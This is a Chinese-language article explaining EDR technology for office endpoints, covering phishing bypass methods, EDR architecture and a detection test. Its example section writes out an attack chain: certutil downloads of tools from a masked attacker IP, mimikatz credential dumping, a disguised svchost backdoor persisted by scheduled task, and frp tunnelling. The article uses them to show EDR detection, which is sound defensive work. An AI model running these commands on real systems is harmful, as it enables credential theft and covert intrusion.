终端安全面临的挑战
从安全日常管理实践出发,终端安全的常见风险点是钓鱼攻击。因终端业务场景复杂,涉及即时通信软件、邮件等方式,如设置较严苛的拦截规则,则会造成较大的业务影响,且部分钓鱼通道为加密通道,无法在事前进行检测拦截,如钓鱼成功,恶意文件落地,当前传统防病毒方案无法有效防御。常见的绕过方式如下:
- 免杀绕过:对恶意文件进行加密、加壳、花指令等手段进行免杀,并在投放前通过主流防病毒引擎和文件信誉平台进行验证,躲避主流防病毒引擎基于特征码的文件检查。
- 白程序利用:通过微软系统自带的程序掩护行踪实现入侵,躲避传统的进程检查,如:svchost、InstallUtil.exe、Msiexec、Rundll32等。
- 0day漏洞:Payload未公开,防病毒引擎无特征码匹配,无法查杀。
黑客若绕过,并通过攻击手段,成功获取内网终端权限,之后对内网进行全面的渗透,造成显著的安全风险,如图1所示。因当前端点威胁检测能力较弱,在触达检测能力更强的生产环境前,可能长时间潜伏和探测,难以有效的识别攻击者。
图1 典型的黑客攻击路径 |
因此,将具备更强检测能力的EDR推广到办公终端,以应对当下终端安全的挑战。
EDR概述
终端威胁检测与响应技术(Endpoint Detection And Response,EDR)是一种先进的主动防御技术,它以“预测、防护、检测和响应”的技术体系,全面覆盖终端安全事件的全过程。EDR通过实时监测终端行为,采集运行状态,并利用大数据安全分析、机器学习、沙箱分析和行为分析等技术,提供深度监控、威胁检测、高级威胁分析、调查取证、事件响应处置和追踪溯源等功能,赋予终端强大的主动安全防御能力。
工作原理
终端威胁检测与响应的原理架构如图2所示,包括四部分,分别是防护代理、管理平台、分析中心和安全态势,各部分的功能和作用如下:
防护代理:支持Windows、MAC、Linux,在终端采集并上报运行数据,提取可疑样本到管理平台分析,同时在发现安全威胁时,能够进行响应处置。
管理平台:管理、存储和分发整个系统的安全策略,监视防护代理的运行状态,对防护代理采集的数据进行威胁分析,感知和发现入侵行为,提取入侵攻击的行为特征,对入侵者进行画像,并对入侵攻击行为发起应急响应处理等。
分析平台:分析平台向管理平台提供分析服务,通过对样本进行黑白名单查询、病毒引擎检测、智能沙箱分析、威胁情报分析和专家系统分析后,识别出恶意样本文件,并将识别结果反馈给管理平台,实现恶意代码二次攻击抑制。
安全态势:对EDR采集的安全状态数据、告警日志数据、安全事件信息、任务处置情况进行融合处理、过滤、分析、整编,以GIS、图表等可视化方式展示攻击源、攻击过程、统计排名等态势数据,为应急处置提供决策依据,是EDR宏观掌握终端整体安全状态的重要抓手。
图2 EDR架构 |
关键技术分析
数据采集技术
采集终端静态和动态数据,静态数据采集部分包括采集操作系统运行的当前状态,如资产信息、服务、端口、进程等。动态信息包括操作系统上发生的各类行为操作,如账户创建、网络访问、文件操作等,记录并采集动作关联的进程、目标文件、网络数据等。
大数据分析技术
将终端采集的各类异构数据进行集中存储和数据分析,结合ATT&CK攻击模型,通过深度学习、关联分析、聚类分析等,发现和识别出终端上隐藏的安全威胁,并发现不满足安全要求和不符合安全规定的终端。
威胁情报技术
结合威胁情报技术,为EDR提供海量的内外部威胁数据、恶意样本数据、黑客组织画像信息等关键数据,可快速识别恶意样本,对威胁告警进行综合研判。
安全取证技术
在安全事件发生后,对发生时和发生后的终端运行状态进行取证,追查攻击行为,重放攻击过程,对攻击事件进行追踪和溯源。
安全实例
钓鱼场景下的小样本攻防测试,恶意样本已做过免杀,点击恶意文件样本
跳板机上线,并从远控端执行下述恶意命令
信息收集
shell whoami shell ipconfig shell wmic process get |
凭据窃取
shell certutil -urlcache -split -f "http:// 1xx.xx.xx.xxx:8000/Credential_Access.rar" "C:\Users\Credential_Access.rar" shell C:\Users\public\Rar.exe x "C:\Users\Credential_Access.rar" -op "C:\Users" shell C:\Users\Credential_Access\mimikatz\x64\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" |
权限维持
shell certutil -urlcache -split -f "http:// 1xx.xx.xx.xxx:8000/backdoor/svchost.exe" C:\svch0st.exe |
shell schtasks /create /F /tn WindowsUpdateCheck /tr "C:\svch0st.exe" /sc HOURLY /mo 5 |
横向爆破
shell certutil -urlcache -split -f "http:// 1xx.xx.xx.xx:8000/Command_and_Control.rar" "C:\Users\Command_and_Control.rar" shell C:\Users\public\Rar.exe x "C:\Users\Command_and_Control.rar" -op "C:\Users" shell C:\Users\Command_and_Control\frp\frps.exe -c "C:\Users\Command_and_Control\frp\frps.ini" |
安全事件聚合,可以看到虽然恶意样本做过免杀,但EDR通过行为分析,依然可以检测并产生高危告警,其后续的所有恶意行为也均可在攻击图谱中发现并处置。
注意事项
为了提高审计效率,EDR的告警降噪工作至关重要。加白规则需贴合匹配告警内容,避免攻击行为绕过。同时,可以根据自身场景添加定制化的IOC规则,但需注意避免匹配正常业务行为,以免造成审计成本增加或业务影响。
自定义行为检测规则(IOC)
EDR的内置规则大多为通用性规则,为提高响应效率,我们可以根据自身场景,添加定制化IOC规则,需注意是否会匹配正常业务行为,明确后方可添加,否则可能会导致审计成本变高或对业务造成影响。
总结
随着信息安全技术的发展,网络攻击已经变得更有针对性、隐蔽性和持久性,终端威胁检测与响应(EDR)技术的出现为新型安全威胁的检测和与防护提供了新思路。EDR在面对为未知威胁攻击、0day漏洞攻击和APT攻击等所表现出的先进性和优越性,已经成为终端安全防护体系的重要组成部分。